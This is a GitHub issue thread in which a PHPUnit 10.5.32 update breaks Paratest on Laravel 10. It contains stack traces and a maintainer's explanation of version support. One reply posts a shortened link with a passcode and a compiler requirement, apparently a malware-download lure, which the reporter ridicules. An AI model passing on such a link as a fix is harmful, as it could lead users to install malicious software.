### ISSUE TITLE
Release 10.5.32 breaks Paratest execution on Laravel 10

### ISSUE THREAD

**Issue by yalsicor** [sebastianbergmann/phpunit#5939]
| Q                   | A
| --------------------| ---------------
| PHPUnit version     | 10.5.32
| PHP version         | 8.3.11
| Installation Method | Composer
| Paratest version | 7.4.5
| Laravel version | 10.48.20

#### Summary

After updating phpunit package to version 10.5.32, paratest throws an indescriptive error after all tests have run.

Tests are run using the Laravel test run helper command: `php artisan test --parallel --coverage-clover=coverage.xml --log-junit=test-results.xml`

Let me know if I can provide any more information.

#### Current behavior

following error is thrown after test execution with Paratest, making the test run fail altogether:

```
Fatal error: Uncaught Illuminate\Contracts\Container\BindingResolutionException: Target [Illuminate\Contracts\Debug\ExceptionHandler] is not instantiable. in /var/www/html/vendor/laravel/framework/src/Illuminate/Container/Container.php:1126
Stack trace:
#0 /var/www/html/vendor/laravel/framework/src/Illuminate/Container/Container.php(921): Illuminate\Container\Container->notInstantiable('Illuminate\\Cont...')
#1 /var/www/html/vendor/laravel/framework/src/Illuminate/Container/Container.php(795): Illuminate\Container\Container->build('Illuminate\\Cont...')
#2 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Application.php(961): Illuminate\Container\Container->resolve('Illuminate\\Cont...', Array, true)
#3 /var/www/html/vendor/laravel/framework/src/Illuminate/Container/Container.php(731): Illuminate\Foundation\Application->resolve('Illuminate\\Cont...', Array)
#4 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Application.php(946): Illuminate\Container\Container->make('Illuminate\\Cont...', Array)
#5 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/HandleExceptions.php(288): Illuminate\Foundation\Application->make('Illuminate\\Cont...')
#6 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/HandleExceptions.php(207): Illuminate\Foundation\Bootstrap\HandleExceptions->getExceptionHandler()
#7 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/HandleExceptions.php(189): Illuminate\Foundation\Bootstrap\HandleExceptions->renderForConsole(Object(TypeError))
#8 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/HandleExceptions.php(255): Illuminate\Foundation\Bootstrap\HandleExceptions->handleException(Object(TypeError))
#9 [internal function]: Illuminate\Foundation\Bootstrap\HandleExceptions->Illuminate\Foundation\Bootstrap\{closure}(Object(TypeError))
#10 {main}
  thrown in /var/www/html/vendor/laravel/framework/src/Illuminate/Container/Container.php on line 1126

Fatal error: Uncaught Illuminate\Contracts\Container\BindingResolutionException: Target [Illuminate\Contracts\Debug\ExceptionHandler] is not instantiable. in /var/www/html/vendor/laravel/framework/src/Illuminate/Container/Container.php:1126
Stack trace:
#0 /var/www/html/vendor/laravel/framework/src/Illuminate/Container/Container.php(921): Illuminate\Container\Container->notInstantiable('Illuminate\\Cont...')
#1 /var/www/html/vendor/laravel/framework/src/Illuminate/Container/Container.php(795): Illuminate\Container\Container->build('Illuminate\\Cont...')
#2 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Application.php(961): Illuminate\Container\Container->resolve('Illuminate\\Cont...', Array, true)
#3 /var/www/html/vendor/laravel/framework/src/Illuminate/Container/Container.php(731): Illuminate\Foundation\Application->resolve('Illuminate\\Cont...', Array)
#4 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Application.php(946): Illuminate\Container\Container->make('Illuminate\\Cont...', Array)
#5 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/HandleExceptions.php(288): Illuminate\Foundation\Application->make('Illuminate\\Cont...')
#6 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/HandleExceptions.php(207): Illuminate\Foundation\Bootstrap\HandleExceptions->getExceptionHandler()
#7 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/HandleExceptions.php(189): Illuminate\Foundation\Bootstrap\HandleExceptions->renderForConsole(Object(Symfony\Component\ErrorHandler\Error\FatalError))
#8 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/HandleExceptions.php(231): Illuminate\Foundation\Bootstrap\HandleExceptions->handleException(Object(Symfony\Component\ErrorHandler\Error\FatalError))
#9 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/HandleExceptions.php(255): Illuminate\Foundation\Bootstrap\HandleExceptions->handleShutdown()
#10 [internal function]: Illuminate\Foundation\Bootstrap\HandleExceptions->Illuminate\Foundation\Bootstrap\{closure}()
#11 {main}
  thrown in /var/www/html/vendor/laravel/framework/src/Illuminate/Container/Container.php on line 1126

Process finished with exit code 255
```

#### How to reproduce

Update phpunit package to version 10.5.32, v10.5.31 works fine.

#### Expected behavior

with v10.5.31 the error does not happen

**Comment by tinsn** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by yalsicor** [comment]
> Give this a shot https://bit.ly/4eaAnWN Passcode: changeme you must have a gcc compiler

yeah sure, and Santa is real :D

**Comment by sebastianbergmann** [comment]
@Slamdunk **ping**

**Comment by Slamdunk** [comment]
ParaTest `v7.5.4` [only supports PHPUnit 11](https://github.com/paratestphp/paratest/blob/v7.5.4/composer.json#L46) and generally speaking ParaTest only supports the latest PHPUnit's version.

A solution for PHPUnit 10 can be found here: https://github.com/paratestphp/paratest/pull/883#issuecomment-2330971002

@sebastianbergmann you can close this, thank you for the ping.

**Comment by yalsicor** [comment]
Thats what I thought, thanks @Slamdunk for the clarification.

We cannot upgrade to PHPUnit 11 as for now, so I will pin PHPUnit to the latest working version for the time being.

**Comment by negoziator** [comment]
I tried to comment on this on the commit but that was rejected 😢 

https://github.com/paratestphp/paratest/commit/c1a1cffe0c8dd5371bfae6b4f26bef3d976fe32b
